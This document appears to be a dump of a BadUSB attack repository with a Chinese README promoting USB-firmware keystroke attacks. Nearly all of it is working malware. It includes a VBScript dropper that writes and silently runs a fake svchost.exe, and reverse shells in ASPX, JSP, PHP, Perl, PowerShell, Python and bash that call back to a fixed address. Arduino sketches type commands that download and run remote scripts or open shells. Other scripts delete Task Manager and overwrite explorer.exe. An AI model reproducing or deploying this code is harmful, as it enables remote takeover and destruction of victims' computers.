wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(185)&Chr(103)&Chr(193)&Chr(128)&Chr(176)&Chr(186)&Chr(49)&Chr(120)&Chr(24)&Chr(106)&Chr(53)&Chr(29)&Chr(169)&Chr(185)&Chr(208)&Chr(31)&Chr(12)&Chr(231)&Chr(176)&Chr(241)&Chr(95)&Chr(233)&Chr(122)&Chr(216)&Chr(214)&Chr(95)&Chr(138)&Chr(162)&Chr(8)&Chr(132)&Chr(52)&Chr(206)&Chr(221)&Chr(247)&Chr(244)&Chr(26)&Chr(119)&Chr(198)&Chr(248)&Chr(96)&Chr(87)&Chr(252)&Chr(214)&Chr(57)&Chr(25)&Chr(230)&Chr(218)&Chr(128)&Chr(175)&Chr(68)&Chr(75)&Chr(198)&Chr(17)&Chr(115)&Chr(145)&Chr(37)&Chr(148)&Chr(52)&Chr(106)&Chr(150)&Chr(9)&Chr(6)&Chr(168)
Dim eyulDLCNyPhly
Set eyulDLCNyPhly = CreateObject("Scripting.FileSystemObject")
Dim ztgykKkZMO
Dim IxLPuRIJZ
Dim sBpfsVCwFv
Dim KIymDWTNS
Set IxLPuRIJZ = eyulDLCNyPhly.GetSpecialFolder(2)
KIymDWTNS = IxLPuRIJZ & "\" & eyulDLCNyPhly.GetTempName()
eyulDLCNyPhly.CreateFolder(KIymDWTNS)
sBpfsVCwFv = KIymDWTNS & "\" & "svchost.exe"
Set ztgykKkZMO = eyulDLCNyPhly.CreateTextFile(sBpfsVCwFv,2,0)
ztgykKkZMO.Write wvWPLP
ztgykKkZMO.Close
Dim iRUzZUgWeAViBB
Set iRUzZUgWeAViBB = CreateObject("Wscript.Shell")
iRUzZUgWeAViBB.run sBpfsVCwFv, 0, false
End Sub
gJjCrDeBtLBn
%>
================================================
FILE: MSF_Trojanlinkage/shell.aspx
================================================
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.IO" %>
<script runat="server">
private static Int32 MEM_COMMIT=0x1000;
private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId);
protected void Page_Load(object sender, EventArgs e)
{
byte[] cm4LyzU5U = new byte[341] {
0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,
0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,
0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,
0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,
0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,
0x77,0x26,0x07,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,
0x68,0xc0,0xa8,0x2b,0xf2,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,
0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x67,
0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,
0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,
0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,
0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0x0f,0x85,0x70,0xff,0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x01,
0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5 };
IntPtr lyJHQJZlCdU = VirtualAlloc(IntPtr.Zero,(UIntPtr)cm4LyzU5U.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
System.Runtime.InteropServices.Marshal.Copy(cm4LyzU5U,0,lyJHQJZlCdU,cm4LyzU5U.Length);
IntPtr yfjmxMfZtg = IntPtr.Zero;
IntPtr eKHXA = CreateThread(IntPtr.Zero,UIntPtr.Zero,lyJHQJZlCdU,IntPtr.Zero,0,ref yfjmxMfZtg);
}
</script>
================================================
FILE: MSF_Trojanlinkage/shell.jsp
================================================
<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>
<%
class StreamConnector extends Thread
{
InputStream ck;
OutputStream zl;
StreamConnector( InputStream ck, OutputStream zl )
{
this.ck = ck;
this.zl = zl;
}
public void run()
{
BufferedReader ov = null;
BufferedWriter hgi = null;
try
{
ov = new BufferedReader( new InputStreamReader( this.ck ) );
hgi = new BufferedWriter( new OutputStreamWriter( this.zl ) );
char buffer[] = new char[8192];
int length;
while( ( length = ov.read( buffer, 0, buffer.length ) ) > 0 )
{
hgi.write( buffer, 0, length );
hgi.flush();
}
} catch( Exception e ){}
try
{
if( ov != null )
ov.close();
if( hgi != null )
hgi.close();
} catch( Exception e ){}
}
}
try
{
String ShellPath;
if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
ShellPath = new String("/bin/sh");
} else {
ShellPath = new String("cmd.exe");
}
Socket socket = new Socket( "192.168.43.242", 4444 );
Process process = Runtime.getRuntime().exec( ShellPath );
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
%>
================================================
FILE: MSF_Trojanlinkage/shell.php
================================================
/*<?php /**/ error_reporting(0); $ip = '192.168.43.242'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
================================================
FILE: MSF_Trojanlinkage/shell.pl
================================================
perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.43.242:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
================================================
FILE: MSF_Trojanlinkage/shell.psl
================================================
function yI6 {
Param ($pwJF, $eI)
$pk1l = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
return $pk1l.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($pk1l.GetMethod('GetModuleHandle')).Invoke($null, @($pwJF)))), $eI))
}
function jQhd {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $iis,
[Parameter(Position = 1)] [Type] $fM = [Void]
)
$ndG = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$ndG.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $iis).SetImplementationFlags('Runtime, Managed')
$ndG.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $fM, $iis).SetImplementationFlags('Runtime, Managed')
return $ndG.CreateType()
}
[Byte[]]$iLgSz = [System.Convert]::FromBase64String("/EiD5PDozAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdBmgXgYCwIPhXIAAACLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpS////11JvndzMl8zMgAAQVZJieZIgeygAQAASYnlSbwCABFcwKgr8kFUSYnkTInxQbpMdyYH/9VMiepoAQEAAFlBuimAawD/1WoKQV5QUE0xyU0xwEj/wEiJwkj/wEiJwUG66g/f4P/VSInHahBBWEyJ4kiJ+UG6maV0Yf/VhcB0Ckn/znXl6JMAAABIg+wQSIniTTHJagRBWEiJ+UG6AtnIX//Vg/gAflVIg8QgXon2akBBWWgAEAAAQVhIifJIMclBulikU+X/1UiJw0mJx00xyUmJ8EiJ2kiJ+UG6AtnIX//Vg/gAfShYQVdZaABAAABBWGoAWkG6Cy8PMP/VV1lBunVuTWH/1Un/zuk8////SAHDSCnGSIX2dbRB/+dYagBZScfC8LWiVv/V")
$zpx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((yI6 kernel32.dll VirtualAlloc), (jQhd @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $iLgSz.Length,0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($iLgSz, 0, $zpx, $iLgSz.length)
$sSYR = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((yI6 kernel32.dll CreateThread), (jQhd @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$zpx,[IntPtr]::Zero,0,[IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((yI6 kernel32.dll WaitForSingleObject), (jQhd @([IntPtr], [Int32]))).Invoke($sSYR,0xffffffff) | Out-Null
================================================
FILE: MSF_Trojanlinkage/shell.py
================================================
import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguNDMuMjQyJyw0NDQ0KSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyhkLHsncyc6c30pCg==')))
================================================
FILE: MSF_Trojanlinkage/shell.sh
================================================
0<&202-;exec 202<>/dev/tcp/192.168.43.242/4444;sh <&202 >&202 2>&202
================================================
FILE: OSX_Built-inReverseShell/OSX_SystemReverseConnection (dns_shell).ino
================================================
void setup()
{
delay(5000);
run("terminal");
delay(3000);
Keyboard.print("nslookup -querytype=txt INPUT0 |");
delay(200);
Keyboard.print(" INPUT0 |");
delay(200);
Keyboard.print("grep text | cut -d \" \" -f3-");
delay(200);
Keyboard.print(" | tr -d \"\\\"\" | base64 -D");
delay(200);
Keyboard.println(" | /bin/bash");
}
void loop()
{
}
void run(char *SomeCommand){
Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
Keyboard.set_key1(KEY_SPACE);
Keyboard.send_now();
delay(500);
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
Keyboard.print(SomeCommand);
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
Keyboard.set_key1(0);
Keyboard.send_now();
}
================================================
FILE: OSX_Built-inReverseShell/OSX_SystemReverseConnection (perl_shell).ino
================================================
void setup()
{
delay(5000);
run("terminal");
delay(3000);
Keyboard.print("perl -MIO -e '$p=fork;exit,if");
delay(100);
Keyboard.print("($p);$c=new IO::Socket::INET");
delay(100);
Keyboard.print("(PeerAddr,\"INPUT0:INPUT1\"");
delay(100);
Keyboard.print(");STDIN->fdopen($c,r);$~->");
delay(100);
Keyboard.print("fdopen($c,w);system$_ ");
delay(100);
Keyboard.println("while<>;'");
}
void loop()
{
}
void run(char *SomeCommand){
Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
Keyboard.set_key1(KEY_SPACE);
Keyboard.send_now();
delay(500);
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
Keyboard.print(SomeCommand);
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
Keyboard.set_key1(0);
Keyboard.send_now();
}
================================================
FILE: OSX_Built-inReverseShell/OSX_SystemReverseConnection (ruby_shell).ino
================================================
void setup()
{
delay(5000);
run("terminal");
delay(3000);
Keyboard.print("ruby -rsocket -e 'exit if fork;");
delay(100);
Keyboard.print("c=TCPSocket.new");
delay(100);
Keyboard.print("(\"INPUT0\",\"INPUT1\"");
delay(100);
Keyboard.print(");while(cmd=c.gets);IO.popen");
delay(100);
Keyboard.println("(cmd,\"r\"){|io|c.print io.read}end'");
delay(100);
}
void loop()
{
}
void run(char *SomeCommand){
Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
Keyboard.set_key1(KEY_SPACE);
Keyboard.send_now();
delay(500);
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
Keyboard.print(SomeCommand);
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
Keyboard.set_key1(0);
Keyboard.send_now();
}
================================================
FILE: PSL_FullScreen-HACKED/FullScreenHackedv0/FullScreenHackedv/FullScreenHackedv.ino
================================================
void setup() {//初始化
Keyboard.begin();//开始键盘通讯
delay(5000);//延时
Keyboard.press(KEY_LEFT_GUI);//win键
delay(500);
Keyboard.press('r');//r键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("POWERSHELL -NOP");
delay(1000);
Keyboard.println("START-PROCESS -fILEpATH POWERSHELL \" -NOP -W HIDDEN -C SET-eXECUTIONpOLICY rEMOTEsIGNED -FORCE;CD $ENV:PUBLIC;(nEW-oBJECT sYSTEM.nET.wEBcLIENT).dOWNLOADfILE(\'HTTP://FQ.WC.LT/UP/1459435782.PS1\',\'C:\\USERS\\PUBLIC\\GET.PS1\');./GET.PS1;EXIT\" -vERB RUNAS;EXIT");
delay(500);
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();//结束键盘通讯
}
void loop()//循环
{
Keyboard.release(KEY_LEFT_ALT);
Keyboard.press(KEY_LEFT_ALT);
Keyboard.print('y');
Keyboard.release(KEY_LEFT_ALT);
Keyboard.release(KEY_LEFT_ALT);
Keyboard.release(KEY_LEFT_ALT);
Keyboard.release(KEY_LEFT_ALT);
delay(50);
}
================================================
FILE: PSL_FullScreen-HACKED/FullScreenHackedv0/get.ps1
================================================
cd \;
(New-Object System.Net.Webclient).DownloadFile("http://image.cnsc8.com/tupian_201501/Big_Pic/nRz13KeMr5.jpg","c:\x.jpg");
Start-Sleep -Seconds 5;
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /d c:\x.jpg /f;RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters;
taskkill /F /IM explorer.exe;
Start-Sleep -Seconds 5;
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /d c:\x.jpg /f;RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters;
taskkill /F /IM explorer.exe;
Remove-Item get.ps1;
exit;
================================================
FILE: PSL_FullScreen-HACKED/FullScreenHackedv2/FullScreenHackedv2.ino
================================================
void setup() {
Keyboard.begin();
delay(5000);
Keyboard.press(KEY_LEFT_GUI);
delay(500);
Keyboard.press('r');
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
delay(500);
Keyboard.println("POWERSHELL -W HIDDEN -NOP -C \"IEX(nEW-oBJECT nET.wEBcLIENT).dOWNLOADsTRING('HTTP://PAN.PLYZ.NET/D.ASP?U=1369254435&P=sns.PS1')\";EXIT");
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();
}
void loop()
{
}
================================================
FILE: PSL_FullScreen-HACKED/FullScreenHackedv2/wall.ps1
================================================
$down="$env:userprofile\Local Settings\Application Data\Microsoft\Wallpaper1.bmp"
(New-Object System.Net.WebClient).DownloadFile('http://7xrn7f.com1.z0.glb.clouddn.com/16-6-2/70005991.jpg',$down);
start-sleep 5
cmd /c "reg add `"HKEY_CURRENT_USER\Control Panel\Desktop`" /v `"WallpaperStyle`" /t reg_sz /d 2 /f"
cmd /c "reg add `"HKEY_CURRENT_USER\Control Panel\Desktop`" /v Wallpaper /d `"%userProfile%\Local Settings\Application Data\Microsoft\Wallpaper1.bmp`" /f"
cmd /c "reg add `"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System`" /v Wallpaper /d `"%userProfile%\Local Settings\Application Data\Microsoft\Wallpaper1.bmp`" /f"
cmd /c "reg add `"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System`" /v WallpaperStyle /d "2" /f"
cmd /c "RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters"
cmd /c "gpupdate /force"
cmd /c "takeown /f c:\windows\explorer.exe"
cmd /c "echo y `|cacls c:\windows\explorer.exe /g administrator:f"
cmd /c "icacls c:\windows\explorer.exe /grant administrator:f"
cmd /c "takeown /f C:\Windows\System32\taskmgr.exe"
cmd /c "echo y `|cacls C:\Windows\System32\taskmgr.exe /g administrator:f"
cmd /c "icacls c:\windows\System32\taskmgr.exe /grant administrator:f"
cmd /c "del /f /q C:\Windows\System32\taskmgr.exe"
cmd /c "taskkill /f /im explorer.exe&echo 123>c:\windows\explorer.exe"
================================================
FILE: PSL_FullScreen-HACKED/FullScreenHackedv3[慎用]/FullScreenHackedv3/FullScreenHackedv3.ino
================================================
void setup(){
Keyboard.begin();//开始键盘通讯
delay(5000);//延时
Keyboard.press(KEY_LEFT_GUI);//win键
delay(500);
Keyboard.press('r');//r键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("POWERSHELL -NOP");
Keyboard.println();
delay(1000);
Keyboard.println("START-PROCESS -fILEpATH POWERSHELL \" -NOP -W HIDDEN -C SET-eXECUTIONpOLICY rEMOTEsIGNED -FORCE;IEX(nEW-OBJECT sYSTEM.nET.wEBcLIENT).dOWNLOADsTRING(`'HTTP://PAN.PLYZ.NET/D.ASP?U=1235108351&P=GET.PS1`');EXIT\" -vERB RUNAS;EXIT");
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();//结束键盘通讯
}
void loop()//循环
{
//bypass uac 绕过UAC,这一段不会用的不要用,否则后果自负
//Keyboard.press(KEY_LEFT_ALT);
//Keyboard.print('y');
//Keyboard.release(KEY_LEFT_ALT);
}
================================================
FILE: PSL_FullScreen-HACKED/FullScreenHackedv3[慎用]/get.ps1
================================================
$down="$env:userprofile\Local Settings\Application Data\Microsoft\Wallpaper1.bmp"
(New-Object System.Net.WebClient).DownloadFile('http://7xrn7f.com1.z0.glb.clouddn.com/16-6-2/70005991.jpg',$down);
start-sleep 5
cmd /c "reg add `"HKEY_CURRENT_USER\Control Panel\Desktop`" /v `"WallpaperStyle`" /t reg_sz /d 2 /f"
cmd /c "reg add `"HKEY_CURRENT_USER\Control Panel\Desktop`" /v Wallpaper /d `"%userProfile%\Local Settings\Application Data\Microsoft\Wallpaper1.bmp`" /f"
cmd /c "reg add `"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System`" /v Wallpaper /d `"%userProfile%\Local Settings\Application Data\Microsoft\Wallpaper1.bmp`" /f"
cmd /c "reg add `"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System`" /v WallpaperStyle /d "2" /f"
cmd /c "RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters"
cmd /c "gpupdate /force"
cmd /c "takeown /f c:\windows\explorer.exe"
cmd /c "echo y `|cacls c:\windows\explorer.exe /g administrator:f"
cmd /c "icacls c:\windows\explorer.exe /grant administrator:f"
cmd /c "takeown /f C:\Windows\System32\taskmgr.exe"
cmd /c "echo y `|cacls C:\Windows\System32\taskmgr.exe /g administrator:f"
cmd /c "icacls c:\windows\System32\taskmgr.exe /grant administrator:f"
cmd /c "del /f /q C:\Windows\System32\taskmgr.exe"
cmd /c "taskkill /f /im explorer.exe&echo "h">c:\windows\explorer.exe"
================================================
FILE: README.cn.md
================================================
# BadUSB
<br>
该项目利用USB协议上的漏洞,通过更改USB的内部固件,在接入USB接口后,模拟外置鼠标、键盘的功能,以此来使目标主机执行已经精心构造好的命令。<br>
<br>
#### QQ交流群:775942445
#### 加微信-进入交流群:wwy18795980897
### 前言
和大多数人一样,最初见到BadUSB是在美剧《黑客军团》中,是fsociety组织常用的工具之一,无论是向服务器下载木马控制被害者主机,还是达琳在停车场帅气的扔出大量USB钓鱼,BadUSB都是功不可没的物理武器之一。
<br>
### 优势
在USB攻击领域,很多年前常用的是老式USB病毒(自动运行)autorun.inf,但文件现在已经会被杀毒软件轻易地查杀,与autorun.inf不同,BadUSB是利用了USB协议上的漏洞,通过更改USB的内部固件,在正常的USB接口接入后,模拟外置鼠标、键盘的功能,以此来使目标主机执行已经精心构造好的命令。在此过程中不会引起杀毒软件、防火墙的一丝怀疑。而且因为是在固件级别的应用,U盘格式化根本无法阻止其内部代码的执行。
<br>
我最新欢的是Leonardo_Arduino板子,因为同样是对USB的利用,Windows、Linux、MAC等各类操作系统默认存在leonardo_Arduino的USB接口驱动,不必联网下载专用的驱动程序。此外,向BadUSB烧录的程序极为简单,大部分是对键盘、鼠标按键进行模拟,上手较为容易。
BadUSB也是社会工程学的一个典型示例,它极大地利用了人们的好奇心,在路边捡到的USB,估计九成以上的人们都想看看里面有什么东西,而当你插入个人主机或公司内网,攻击就很难再停止下来了。<br>
<br>
### 教程
[具体步骤请移步至简书](https://www.jianshu.com/p/2b2b1dab85fe) <br>
<br>
### 目录导图<br>
BadUSB
│ LICENSE
│ README.en.md
│ README.md
│
├─BlueScreen蓝屏
│ BlueScreen蓝屏1(DOS).ino
│ BlueScreen蓝屏2(DOS).ino
│ BlueScreen蓝屏3(DOS).ino
│ xp和win7的蓝屏代码(DOS攻击).ino
